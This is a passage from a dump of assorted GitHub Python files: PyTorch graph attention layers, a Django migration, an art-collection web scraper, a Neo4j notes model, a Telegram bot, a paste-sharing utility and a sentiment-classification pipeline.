dim=0)\n value = torch.cat(torch.split(value, self.M, dim=-1), dim=0)\n\n attention = torch.matmul(query, key.transpose(2, 3))\n attention /= (self.d ** 0.5)\n attention = F.softmax(attention, dim=-1)\n\n X = torch.matmul(attention, value)\n X = torch.cat(torch.split(X, num_vertex, dim=0), dim=-1)\n X = self.FC(X)\n del query, key, value, attention\n return X\n\n\nclass graphAttention(nn.Module):\n '''\n multi-graph attention mechanism\n X: [num_vertices, num_graphs, num_vertices, D]\n SGE: [num_vertices, num_graphs, num_vertices, D]\n M: number of attention heads\n d: dimension of each attention outputs\n return: [num_vertices, num_graphs, num_vertices, D]\n '''\n def __init__(self, M, d, bn_decay, mask=True):\n super(graphAttention, self).__init__()\n self.d = d\n self.M = M\n D = self.M * self.d\n self.mask = mask\n self.FC_q = FC(input_dims=2 * D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n self.FC_k = FC(input_dims=2 * D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n self.FC_v = FC(input_dims=2 * D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n self.FC = FC(input_dims=D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n\n def forward(self, X, SGE):\n num_vertex_ = X.shape[0]\n X = torch.cat((X, SGE), dim=-1)\n # [num_vertices, num_graphs, num_vertices, 2 * D]\n\n query = self.FC_q(X)\n key = self.FC_k(X)\n value = self.FC_v(X)\n\n query = torch.cat(torch.split(query, self.M, dim=-1), dim=0)\n key = torch.cat(torch.split(key, self.M, dim=-1), dim=0)\n value = torch.cat(torch.split(value, self.M, dim=-1), dim=0) \n # [M * num_vertices, num_graphs, num_vertices, d]\n\n query = query.permute(0, 2, 1, 3)\n key = key.permute(0, 2, 3, 1)\n value = value.permute(0, 2, 1, 3)\n\n attention = torch.matmul(query, key)\n attention /= (self.d ** 0.5)\n\n if self.mask:\n num_vertex = X.shape[0]\n num_step = X.shape[1]\n mask = torch.ones(num_step, num_step)\n mask = torch.tril(mask)\n mask = torch.unsqueeze(torch.unsqueeze(mask, dim=0), dim=0)\n mask = mask.repeat(self.K * num_vertex, num_vertex, 1, 1)\n mask = mask.to(torch.bool)\n attention = torch.where(mask, attention, -2 ** 15 + 1)\n\n attention = F.softmax(attention, dim=-1)\n\n X = torch.matmul(attention, value)\n X = X.permute(0, 2, 1, 3)\n X = torch.cat(torch.split(X, num_vertex_, dim=0), dim=-1)\n X = self.FC(X)\n del query, key, value, attention\n return X\n\n\nclass gatedFusion(nn.Module):\n '''\n gated fusion\n HS: [num_vertices, num_graphs, num_vertices, D]\n HG: [num_vertices, num_graphs, num_vertices, D]\n D: output dims = M * d\n return: [num_vertices, num_graphs, num_vertices, D]\n '''\n\n def __init__(self, D, bn_decay):\n super(gatedFusion, self).__init__()\n self.FC_xs = FC(input_dims=D, units=D, activations=None,\n bn_decay=bn_decay, use_bias=False)\n self.FC_xt = FC(input_dims=D, units=D, activations=None,\n bn_decay=bn_decay, use_bias=True)\n self.FC_h = FC(input_dims=[D, D], units=[D, D], activations=[F.relu, None],\n bn_decay=bn_decay)\n\n def forward(self, HS, HG):\n XS = self.FC_xs(HS)\n XG = self.FC_xt(HG)\n z = torch.sigmoid(torch.add(XS, XG))\n H = torch.add(torch.mul(z, HS), torch.mul(1 - z, HG))\n H = self.FC_h(H)\n del XS, XG, z\n return H\n\n\nclass STAttBlock(nn.Module):\n def __init__(self, M, d, bn_decay, mask=False):\n super(STAttBlock, self).__init__()\n self.spatialAttention = spatialAttention(M, d, bn_decay)\n self.graphAttention = graphAttention(M, d, bn_decay, mask=mask)\n self.gatedFusion = gatedFusion(M * d, bn_decay)\n\n def forward(self, X, SGE):\n HS = self.spatialAttention(X, SGE)\n HT = self.graphAttention(X, SGE)\n H = self.gatedFusion(HS, HT)\n del HS, HT\n return torch.add(X, H)\n\nclass FusionGraphModel(nn.Module):\n def __init__(self, graph, gpu_id, conf_graph, conf_data, M, d, bn_decay):\n super(FusionGraphModel, self).__init__()\n self.M = M\n self.d = d\n self.bn_decay = bn_decay\n D = self.M * self.d\n self.SG_ATT = STAttBlock(M, d, bn_decay)\n self.SGEmbedding = SGEmbedding(D, bn_decay)\n\n self.FC_1 = FC(input_dims=[1, D], units=[D, D], activations=[F.relu, None],\n bn_decay=self.bn_decay)\n self.FC_2 = FC(input_dims=[D, D], units=[D, 1], activations=[F.relu, None],\n bn_decay=self.bn_decay)\n\n self.graph = graph\n self.matrix_w = conf_graph['matrix_weight']\n # matrix_weight: if True, turn the weight matrices trainable. \n self.attention = conf_graph['attention']\n # attention: if True, the SG-ATT is used.\n self.task = conf_data['type']\n\n device = 'cuda:%d' % gpu_id\n\n if self.graph.graph_num == 1:\n self.fusion_graph = False\n self.A_single = self.graph.get_graph(graph.use_graph[0])\n else:\n self.fusion_graph = True\n self.softmax = nn.Softmax(dim=1)\n\n if self.matrix_w:\n adj_w = nn.Parameter(torch.randn(self.graph.graph_num, self.graph.node_num, self.graph.node_num))\n adj_w_bias = nn.Parameter(torch.randn(self.graph.node_num, self.graph.node_num))\n self.adj_w_bias = nn.Parameter(adj_w_bias.to(device), requires_grad=True)\n self.linear = linear(5, 1)\n\n else:\n adj_w = nn.Parameter(torch.randn(1, self.graph.graph_num))\n\n self.adj_w = nn.Parameter(adj_w.to(device), requires_grad=True)\n self.used_graphs = self.graph.get_used_graphs()\n assert len(self.used_graphs) == self.graph.graph_num\n\n def forward(self):\n\n if self.graph.fix_weight:\n return self.graph.get_fix_weight()\n \n # SE = torch.from_numpy(np.float32(pd.read_csv(r'data\\SE\\se_parking.csv', header=None).values)).to('cuda:0')\n SE = torch.from_numpy(np.float32(pd.read_csv('data\\\\SE\\\\se_pm25.csv', header=None).values)).to('cuda:0')\n # load spatial embedding\n\n if self.fusion_graph:\n if not self.matrix_w:\n self.A_w = self.softmax(self.adj_w)[0]\n adj_list = [self.used_graphs[i] * self.A_w[i] for i in range(self.graph.graph_num)]\n self.adj_for_run = torch.sum(torch.stack(adj_list), dim=0) \n # create a graph stack\n\n else:\n if self.attention:\n W = torch.stack((self.used_graphs))\n GE = W[:,:,0].permute(1, 0).unsqueeze(dim=2)\n # generate graph embbeding\n\n SGE = self.SGEmbedding(SE, GE)\n W = self.FC_1(torch.unsqueeze(W.permute(1, 0, 2), -1))\n W = self.SG_ATT(W, SGE) \n # multi-graph spatial attention\n\n W = self.FC_2(W).squeeze(dim=-1)\n W = torch.sum(self.adj_w * W.permute(1, 0, 2), dim=0)\n\n else:\n W= torch.sum(self.adj_w * torch.stack(self.used_graphs), dim=0)\n act = nn.ReLU()\n W = act(W)\n self.adj_for_run = W\n\n else:\n self.adj_for_run = self.A_single\n\n return self.adj_for_run\n","repo_name":"swsamleo/MLSTGCN","sub_path":"models/fusiongraph.py","file_name":"fusiongraph.py","file_ext":"py","file_size_in_byte":12748,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"40"} +{"seq_id":"74192130680","text":"import numpy as np\n\ndef straight_line_path_planning(q,ps,n_p,n_timesteps):\n\t\"\"\"\n\t\tq: Current location of the target.\n\t\tps: Current locations of the mobile sensors.\n\t\tn_p: The number of sensors\n\t\tn_timesteps: The number of timesteps to plan ahead. \n\t\t----------------------------------------------------------------------------------------\n\t\tOutput: waypoints for each mobile sensor, Shape= (num_time_steps,num_sensors,2)\n\t\"\"\"\n\n\n\tp_trajs=[]\n\n\tq=q.reshape(-1,2)\n\tps=ps.reshape(-1,2)\n\n\tdirection = -(ps-q)\n\tdirection = (direction.T/n_timesteps).T\n\n\tfor i in range(n_timesteps):\n\t\tps= ps + direction\n\t\tp_trajs.append(ps)\n\n\treturn np.array(p_trajs).reshape(-1,n_p,2) # Shape= (num_time_steps,num_sensors,2)\n\n","repo_name":"lina-robotics-lab/fim_track","sub_path":"src/utils/StraightLinePathPlanning.py","file_name":"StraightLinePathPlanning.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73628393399","text":"class Job(object):\n\n def __init__(self, uuid=None, createdAt=None, updatedAt=None, name=None, codeType=None, codeRepoUrl=None, codeRepoUrlLabel=None, codeRepoBranch=None, createUserName=None, codeRepoPrivate=None, createUserPin=None, ossPath=None, ossHost=None, ossBucket=None, buildImage=None, buildImageLabel=None, isUserBuildSetConfig=None, buildSetConfig=None, buildTimeOut=None, buildResourceCpu=None, buildResourceMem=None, noticeMail=None, noticeType=None, compilerType=None, dockerRegistry=None, dockerRepository=None, dockerRegistryUri=None):\n \"\"\"\n :param uuid: (Optional) 构建任务uuid\n :param createdAt: (Optional) 创建时间戳\n :param updatedAt: (Optional) 最后一次更新时间\n :param name: (Optional) 构建名称\n :param codeType: (Optional) 代码存储类型,目前只支持github\n :param codeRepoUrl: (Optional) 代码clone路径\n :param codeRepoUrlLabel: (Optional) 代码名称的显示Label\n :param codeRepoBranch: (Optional) 分支\n :param createUserName: (Optional) 创建者\n :param codeRepoPrivate: (Optional) 是否是私有仓库\n :param createUserPin: (Optional) 最后一次更细者\n :param ossPath: (Optional) 用户云存储路径,如果为空,使用公用的云存储\n :param ossHost: (Optional) 用户云存储主机,实际为用户云存储所在地域\n :param ossBucket: (Optional) 用户云存储bucket,如果为空,使用公用的云存储\n :param buildImage: (Optional) 编译镜像地址\n :param buildImageLabel: (Optional) 编译镜像的显示Label\n :param isUserBuildSetConfig: (Optional) 是否在页面配置构建方式,这项为true,则buildSetConfig需要有内容,如果这项为false,即使buildSetConfig有内容,也不生效\n :param buildSetConfig: (Optional) 见isUserBuildSetConfig的说明\n :param buildTimeOut: (Optional) 超时时间,单位秒\n :param buildResourceCpu: (Optional) cpu分配核数\n :param buildResourceMem: (Optional) 内存分配大小,单位MB\n :param noticeMail: (Optional) 通知邮件\n :param noticeType: (Optional) 通知频率, MAIL_FAILED失败时通知,MAIL_EVERY每次构建就通知\n :param compilerType: (Optional) 构建类型\n :param dockerRegistry: (Optional) 镜像注册表名\n :param dockerRepository: (Optional) 镜像仓库名\n :param dockerRegistryUri: (Optional) 注册表的URI\n \"\"\"\n\n self.uuid = uuid\n self.createdAt = createdAt\n self.updatedAt = updatedAt\n self.name = name\n self.codeType = codeType\n self.codeRepoUrl = codeRepoUrl\n self.codeRepoUrlLabel = codeRepoUrlLabel\n self.codeRepoBranch = codeRepoBranch\n self.createUserName = createUserName\n self.codeRepoPrivate = codeRepoPrivate\n self.createUserPin = createUserPin\n self.ossPath = ossPath\n self.ossHost = ossHost\n self.ossBucket = ossBucket\n self.buildImage = buildImage\n self.buildImageLabel = buildImageLabel\n self.isUserBuildSetConfig = isUserBuildSetConfig\n self.buildSetConfig = buildSetConfig\n self.buildTimeOut = buildTimeOut\n self.buildResourceCpu = buildResourceCpu\n self.buildResourceMem = buildResourceMem\n self.noticeMail = noticeMail\n self.noticeType = noticeType\n self.compilerType = compilerType\n self.dockerRegistry = dockerRegistry\n self.dockerRepository = dockerRepository\n self.dockerRegistryUri = dockerRegistryUri\n","repo_name":"jdcloud-api/jdcloud-sdk-python","sub_path":"jdcloud_sdk/services/compile/models/Job.py","file_name":"Job.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"3440349609","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('game', '0009_auto_20151209_1753'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ('textid', models.CharField(default='Undefined', max_length=30, verbose_name='Event Identifier')),\n ('context', models.BinaryField(default='{}', max_length=500, verbose_name='Context')),\n ('time', models.DateTimeField(verbose_name='Time of event')),\n ('unread', models.BooleanField(default=True, verbose_name='Is Unread')),\n ('hometown', models.ForeignKey(to='game.Village')),\n ],\n ),\n ]\n","repo_name":"Elscouta/hostilelands-py","sub_path":"game/migrations/0010_event.py","file_name":"0010_event.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25269441212","text":"import requests\nimport datetime\nimport json\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse, parse_qs\n\ndef return_bs_content_for_page_nr(page: int) -> BeautifulSoup:\n url = \"https://www.kunstpuntgroningen.nl/kunst/kunst-op-straat/de-collectie/?pag=\"\n url = url + str(page)\n\n r = requests.get(url)\n print(f\"🚀 Inhoud van pagina {url} opgevragen\")\n soup = BeautifulSoup(r.content, \"html.parser\")\n if soup is None:\n print(\"Geen content gevonden met BeautifulSoup\")\n exit\n\n return soup\n \n\ndef return_list_of_urls(soup: BeautifulSoup) -> list:\n print(\"🚀 Ophalen van alle items op de pagina\")\n list_of_urls = []\n css_class_for_item = \"m-tile\"\n css_type_for_item = \"a\"\n\n content = soup.find('base-overview')\n content_data = content.get(':data')\n\n json_content = json.loads(content_data)\n\n for item in json_content['items']:\n list_of_urls.append(item['url'])\n\n print(f\"{str(len(list_of_urls))} items op de pagina gevonden\")\n return list_of_urls\n\ndef scrape_from_object_url(url: str):\n r = requests.get(url)\n soup = BeautifulSoup(r.content, \"html.parser\")\n\n article_element = soup.find(\"article\")\n if article_element:\n title = \"\"\n description = \"\"\n wijk = \"\"\n kunstsoort = \"\"\n jaar = 0\n longitude = 0.0\n latitude = 0.0\n\n header_element = article_element.find(\"header\")\n if header_element:\n h1_title_element = header_element.find(\"h1\", class_=\"a-heading a-heading--h2\")\n\n if h1_title_element:\n title = h1_title_element.get_text(strip=True)\n else:\n print(f\"Title not found for {url}\")\n\n facts_list = article_element.find_all(\"li\", class_=\"m-list__item\")\n for fact in facts_list:\n if \"Wijk\" in fact.text:\n wijk_text = fact.text.replace(\"Wijk\", \"\").strip()\n wijk = wijk_text\n if \"Jaar van realisatie\" in fact.text:\n jaar_text = fact.text.replace(\"Jaar van realisatie\", \"\").strip()\n jaar = int(jaar_text)\n if \"Kunstsoort\" in fact.text:\n kunstsoort_text = fact.text.replace(\"Kunstsoort\", \"\").strip()\n kunstsoort = kunstsoort_text\n\n maps_image = article_element.find(\"base-map-screenshot\")\n try:\n maps_src = maps_image.get(\":markers\")\n maps_markers = json.loads(maps_src)\n latitude = float(maps_markers[0].get('lat', None))\n longitude = float(maps_markers[0].get('lng', None))\n except:\n print(f\"Mislukt om de lon+lat waardes uit {maps_image} te halen\")\n\n art_object = {\n \"id\": 0,\n \"title\": title,\n \"description\": description,\n \"wijk\": wijk,\n \"jaar\": jaar,\n \"kunstsoort\": kunstsoort,\n \"url\": \"\",\n \"avatarFile\": \"\",\n \"gifFile\": \"logitech-muis.gif\",\n \"location\": {\n \"latitude\": latitude,\n \"longitude\": longitude\n }\n }\n\n return art_object\n\ndef return_distinct_kunstsoort():\n\n with open('available-objects.json', 'r') as file:\n data = json.load(file)\n\n distinct_kunstsoort = set(item['kunstsoort'] for item in data)\n\n print(\" \")\n print(\"Distinct values of 'kunstsoort':\")\n for kunstsoort in distinct_kunstsoort:\n print(kunstsoort) \n\ndef return_distinct_wijk():\n\n with open('available-objects.json', 'r') as file:\n data = json.load(file)\n\n distinct_wijk = set(item['wijk'] for item in data)\n print(\" \")\n print(\"Distinct values of 'wijk':\")\n for wijk in distinct_wijk:\n print(wijk) \n\ndef return_collectie():\n\n TOTAL_PAGES = 20\n\n complete_collection = []\n\n soup_page_list = []\n total_url_list = []\n for page_number in range(1, TOTAL_PAGES + 1):\n content = return_bs_content_for_page_nr(page_number)\n soup_page_list.append(content)\n\n for page_content in soup_page_list:\n urls_on_page = return_list_of_urls(page_content)\n\n for url in urls_on_page:\n total_url_list.append(url)\n \n print(f\"🚀 {str(len(total_url_list))} links van objecten gevonden\")\n \n for url in total_url_list:\n art_object = scrape_from_object_url(url)\n\n complete_collection.append(art_object)\n\n complete_collection_as_json = json.dumps(complete_collection, indent=2)\n file_name = \"available-objects.json\"\n\n data = json.loads(complete_collection_as_json)\n\n with open(file_name, \"w\") as json_file:\n json.dump(data, json_file, indent=4)\n\n return_distinct_kunstsoort()\n return_distinct_wijk()\n \n\nif __name__ == \"__main__\":\n return_collectie()","repo_name":"Ffyud/urbaniteer","sub_path":"scrape-kunstspot.py","file_name":"scrape-kunstspot.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4608180831","text":"from flask import request\nimport datetime\nfrom py2neo import Node, Relationship, remote, NodeSelector\n\nfrom models.users_model import User\n\nfrom config import graph\n\n\nclass Note:\n\n @staticmethod\n def find_one(note_id):\n note = graph.run(f\"MATCH (note:Note) WHERE ID(note)={note_id} RETURN note\").evaluate()\n\n if note:\n note['id'] = note_id\n return note\n else:\n return {\"message\": \"Note not found!\"}\n\n @staticmethod\n def find_all(task_id):\n notes = graph.run(\n f\"MATCH (note:Note)-[:IS_NOTE_OF]->(task:Task) WHERE ID(task)={task_id} RETURN note\").data()\n\n notes_list = []\n for n in notes:\n note = n['note']\n note_id = remote(note)._id\n note['id'] = note_id\n\n notes_list.append(note)\n\n return notes_list\n\n @staticmethod\n def add(current_user_id, task_id, data):\n\n all_attributes = [\"client\", \"date\", \"message\", \"user\"]\n\n date_created = str(datetime.datetime.now()).replace(' ', 'T') + \"Z\"\n\n try:\n new_note = Node(\"Note\",\n client=data['client'],\n date=data['date'],\n message=data['message']\n )\n except KeyError as e:\n return {\"message\": f\"You are missing a key element: {e}\"}\n\n new_note['date_created'] = date_created\n new_note['user'] = current_user_id\n\n graph.create(new_note)\n\n task = graph.run(f\"MATCH (task:Task) WHERE ID(task)={task_id} RETURN task\").evaluate()\n\n note_task_rel = Relationship(new_note, 'IS_NOTE_OF', task)\n graph.create(note_task_rel)\n\n new_note['id'] = remote(new_note)._id\n\n return new_note\n\n @staticmethod\n def update(note_id):\n note = Note.find_one(note_id)\n\n if note.get(\"message\") == \"Note not found!\":\n return {\"message\": f\"Note {note_id} not found!\"}\n\n data = request.get_json()\n\n for attribute in data:\n if note[attribute] is not None:\n note[attribute] = data[attribute]\n else:\n return {\"message\": f\"The attribute {attribute} is not found!\"}\n note.push()\n\n return note\n\n @staticmethod\n def delete(note_id):\n note = Note.find_one(note_id)\n\n if note.get(\"message\") == \"Note not found!\":\n return {\"message\": f\"Note {note_id} not found!\"}\n\n graph.run(f\"MATCH (note:Note) WHERE ID(note)={note_id} DETACH DELETE note\").evaluate()\n return {\"message\": f\"The Note with id {note_id} has been deleted\"}","repo_name":"alhemyo/v-man","sub_path":"back-end/models/notes_model.py","file_name":"notes_model.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33075304737","text":"number = input('Enter number (15 or 16 digits): ').upper()\nresult = 0\nfor i in range(15):\n num = number[i]\n r = result\n if(i % 3 == 0):\n result += int(num)\n elif(i % 3 == 1):\n n = int(num) * 2\n result += int(n/10) + n % 10\n else:\n n = int(num) * 3\n result += int(n/10) + n % 10\nremainder = result % 11\nif(remainder == 0):\n digit = 0\nelif(remainder == 1):\n digit = 'X'\nelse:\n digit = 11 - remainder\nif len(number) == 15:\n print('Check digit is: {}'.format(digit))\nelse:\n print('Number {} check'.format('passes' if str(digit) == number[-1] else 'fails'))","repo_name":"spencrr/MSOE-Op-Comp-2018","sub_path":"prob8.py","file_name":"prob8.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11365065400","text":"import tensorflow as tf\nimport numpy as np\nimport os\nfrom PIL import Image\nfrom tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets\n\nTFRECORD_FILE = \"./tmp/binary_mnist.tfrecords\"\nIMAGE_SIZE = 28\nCHANNEL_NUM = 1\n\ndef read_train_data(FLAGS, num1, num2):\n if not os.path.exists(TFRECORD_FILE):\n generate_tfrecord(FLAGS, num1, num2)\n print(\"Successfully generate binary_mnist tfrecords!\")\n tr_data, tr_label = read_tfrecords(FLAGS)\n return tr_data, tr_label\n\n\ndef get_mnist(FLAGS, num1, num2):\n mnist = read_data_sets(\"/dataset/mnist/\", dtype=tf.float32, one_hot=True)\n total_tr_data, total_tr_label = mnist.train.next_batch(mnist.train._num_examples)\n \n # Gathering a1 Data\n tr_data_a1=total_tr_data[(total_tr_label[:,num1]==1.0)]\n # add noise\n for i in range(len(tr_data_a1)):\n for j in range(len(tr_data_a1[0])):\n rand_num=np.random.rand()\n if(rand_num>=0.5):\n tr_data_a1[i,j]=np.minimum(tr_data_a1[i,j]+rand_num,1.0)\n \n # Gathering a2 Data\n tr_data_a2=total_tr_data[(total_tr_label[:,num2]==1.0)]\n for i in range(len(tr_data_a2)):\n for j in range(len(tr_data_a2[0])):\n rand_num=np.random.rand()\n if(rand_num>=0.5):\n tr_data_a2[i,j]=np.minimum(tr_data_a2[i,j]+rand_num,1.0)\n \n tr_data1=np.append(tr_data_a1,tr_data_a2,axis=0)\n tr_label1=np.zeros((len(tr_data1),2),dtype=float)\n for i in range(len(tr_data1)):\n if(iDownload as text', text)[0]\n\n def lang(self, lang):\n return {\n '.py': \"python\",\n '.cs': \"csharp\",\n '.php': \"php\",\n '.css': \"css\",\n \".pl\": \"perl\",\n \".rb\": \"rb\",\n \".css\": \"css\",\n \".sh\": \"bash\",\n \".go\": \"go\",\n \".html\": \"html\",\n \".js\": \"js\"\n }.get(lang, \"text\")\n\n def share(self, file):\n fileName, ext = file\n code = open(fileName+ext, \"r\").read()\n syntax = self.lang(ext)\n\n data = {\"content\": code, \"syntax\": syntax, \"poster\": self.username}\n request = post(\"https://paste.ubuntu.com/\", data=data)\n\n return self.findUrl(request.text)\n\n def main(self, file):\n if not path.exists(file):\n raise FileNotFoundError(\"File {0} Not Found!\".format(file))\n else:\n pasteUrl = self.share(path.splitext(file))\n data = {\"id\": pasteUrl, \"time\": strftime('%c'), \"poster\": self.username}\n self.jData.append(data)\n with open(self.jsonFile, 'w') as outfile:\n dump(self.jData, outfile, sort_keys=True, indent=4)\n return pasteUrl\n","repo_name":"emregeldegul/codesh","sub_path":"codesh/codesh.py","file_name":"codesh.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"9416222267","text":"import inspect\nimport sys\n\nfrom aiogram import Bot, Dispatcher, executor, types\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\n\n\n# from telegramgpt.gpt import send_message_to_openai\nfrom config import BOT_TOKEN, ADMIN_CHAT_ID, logger\n\n\nbot = Bot(token=BOT_TOKEN)\nstorage = MemoryStorage()\ndp = Dispatcher(bot, storage=storage)\n\n\n@dp.message_handler(commands=[\"help\"], chat_id=ADMIN_CHAT_ID)\nasync def cmd_help(message: types.Message):\n \"\"\"Return all available command.\"\"\"\n\n logger.debug(f\"Got message: {message}\")\n\n command_list = [\n name.replace(\"cmd_\", \"/\")\n for name, obj in inspect.getmembers(sys.modules[__name__])\n if (inspect.isfunction(obj) and name.startswith(\"cmd_\"))\n ]\n commands = \"\\n\".join(command_list)\n\n await message.reply(f\"Active commands:\\n{commands}\")\n\n\n@dp.message_handler(commands=[\"check\"], chat_id=ADMIN_CHAT_ID)\nasync def cmd_check(message: types.Message):\n \"\"\"Check bot status.\"\"\"\n\n logger.debug(f\"Got message: {message}\")\n logger.info(\"Check\")\n\n await message.reply(\"OK!\")\n\n\n@dp.message_handler(commands=[\"send_to_openai\"], chat_id=ADMIN_CHAT_ID)\nasync def cmd_send_to_openai(message: types.Message):\n \"\"\"Send message to openai.\"\"\"\n\n logger.debug(f\"Got message: {message}\")\n\n # result = await send_message_to_openai(message=message)\n # if result:\n # await message.reply(result)\n # else:\n # logger.error(f\"Do not get result for message: {message}\")\n # await message.reply(\"Internal error\")\n\n\ndef start_bot() -> None:\n executor.start_polling(dispatcher=dp, skip_updates=True)\n","repo_name":"alserious/TelegramGPTBot","sub_path":"TelegramGPT/telegramgpt/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73626019319","text":"\"\"\"\nSAMR main module, PhraseSentimentPredictor is the class that does the\nprediction and therefore one of the main entry points to the library.\n\"\"\"\nfrom collections import defaultdict\n\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.pipeline import make_pipeline, make_union\nfrom sklearn.metrics import accuracy_score\nimport rnn\nimport numpy as np\n\nfrom transformations import (ExtractText, ExtractAuthor,ExtractDate,EncodingText)\n\n\n_valid_classifiers = {\n \"sgd\": SGDClassifier,\n \"knn\": KNeighborsClassifier,\n \"svc\": SVC,\n \"randomforest\": RandomForestClassifier,\n 'rnn':rnn.RNN,\n}\n\n\ndef target(phrases):\n return [datapoint.rating for datapoint in phrases]\n\n\nclass PhraseSentimentPredictor:\n \"\"\"\n sentiments. API is a-la scikit-learn, where:\n - `__init__` configures the predictor\n - `fit` trains the predictor from data. After calling `fit` the instance\n methods should be free side-effect.\n - `predict` generates sentiment predictions.\n - `score` evaluates classification accuracy from a test set.\n\n Outline of the predictor pipeline is as follows:\n A configurable main classifier is trained with a concatenation of 3 kinds of\n features:\n - The decision functions of set of vanilla SGDClassifiers trained in a\n one-versus-others scheme using bag-of-words as features.\n - (Optionally) The decision functions of set of vanilla SGDClassifiers\n trained in a one-versus-others scheme using bag-of-words on the\n wordnet synsets of the words in a phrase.\n - (Optionally) The amount of \"positive\" and \"negative\" words in a phrase\n as dictated by the Harvard Inquirer sentiment lexicon\n\n\n Optionally, during prediction, it also checks for exact duplicates between\n the training set and the train set. \"\"\"\n def __init__(self, classifier=\"rnn\", classifier_args=None, lowercase=False,\n text_replacements=None, map_to_synsets=False, binary=False,\n min_df=0, ngram=1, stopwords=None, limit_train=None,\n map_to_lex=False, duplicates=False):\n \"\"\"\n Parameter description:\n - `classifier`: The type of classifier used as main classifier,\n valid values are \"sgd\", \"knn\", \"svc\", \"randomforest\".\n - `classifier_args`: A dict to be passed as arguments to the main\n classifier.\n - `lowercase`: wheter or not all words are lowercased at the start of\n the pipeline.\n - `text_replacements`: A list of tuples `(from, to)` specifying\n string replacements to be made at the start of the pipeline (after\n lowercasing).\n - `map_to_synsets`: Whether or not to use the Wordnet synsets\n feature set.\n - `binary`: Whether or not to count words in the bag-of-words\n representation as 0 or 1.\n - `min_df`: Minumim frequency a word needs to have to be included\n in the bag-of-word representation.\n - `ngram`: The maximum size of ngrams to be considered in the\n bag-of-words representation.\n - `stopwords`: A list of words to filter out of the bag-of-words\n representation. Can also be the string \"english\", in which case\n a default list of english stopwords will be used.\n - `limit_train`: The maximum amount of training samples to give to\n the main classifier. This can be useful for some slow main\n classifiers (ex: svc) that converge with less samples to an\n optimum.\n - `max_to_lex`: Whether or not to use the Harvard Inquirer lexicon\n features.\n - `duplicates`: Whether or not to check for identical phrases between\n train and prediction.\n \"\"\"\n self.limit_train = limit_train\n self.duplicates = duplicates\n\n self.vocabulary=[]\n import csv\n with open('./data/vocabulary','rb') as f:\n rd=csv.reader(f)\n for line in rd:\n self.vocabulary.append(line[0])\n\n # Build pre-processing common to every extraction\n pipeline1 = [ExtractText()]\n pipeline1.append(EncodingText(self.vocabulary))\n pipeline=make_pipeline(*pipeline1)\n\n # Build classifier and put everything togheter\n if classifier_args is None:\n classifier_args = {'lambdaL': 0.0001, 'd': 50, 'cat': 4, 'lambdaCat': 1e-07, 'alpha': 0.2, 'lambdaW': 1e-05,'iter':70}\n if 'd' in classifier_args:\n d=classifier_args['d']\n else:\n d=50\n words_vectors=np.random.rand(d,len(self.vocabulary))*2*0.05-0.05\n classifier = _valid_classifiers[classifier](vocab=len(self.vocabulary),words_vectors=words_vectors,**classifier_args)\n\n #classifier=rnn.RNN(d=50,cat=4,vocab=len(self.vocabulary),alpha=0.2,words_vectors=words_vectors,lambdaW=10**(-5),lambdaCat=10**(-7),lambdaL=10**(-4))\n\n self.pipeline = pipeline\n self.classifier = classifier\n\n def fit(self, phrases, y=None):\n \"\"\"\n `phrases` should be a list of `Datapoint` instances.\n `y` should be a list of `str` instances representing the sentiments to\n be learnt.\n \"\"\"\n y = target(phrases)\n if self.duplicates:\n self.dupes = DuplicatesHandler()\n self.dupes.fit(phrases, y)\n Z = self.pipeline.fit_transform(phrases, y)\n if self.limit_train:\n self.classifier.fit(Z[:self.limit_train], y[:self.limit_train])\n else:\n self.classifier.fit(Z, y)\n return self\n\n def predict(self, phrases):\n \"\"\"\n `phrases` should be a list of `Datapoint` instances.\n Return value is a list of `str` instances with the predicted sentiments.\n \"\"\"\n Z = self.pipeline.transform(phrases)\n labels = self.classifier.predict(Z)\n if self.duplicates:\n for i, phrase in enumerate(phrases):\n label = self.dupes.get(phrase)\n if label is not None:\n labels[i] = label\n return labels\n\n def score(self, phrases,k):\n \"\"\"\n `phrases` should be a list of `Datapoint` instances.\n Return value is a `float` with the classification accuracy of the\n input.\n \"\"\"\n pred = self.predict(phrases)\n import csv\n with open('./data/result-'+str(k),'wb') as f:\n wrt=csv.writer(f)\n for i in range(len(phrases)):\n datapoint=[phrases[i].id, phrases[i].date, phrases[i].content, phrases[i].rating, pred[i]]\n wrt.writerow(datapoint)\n\n return 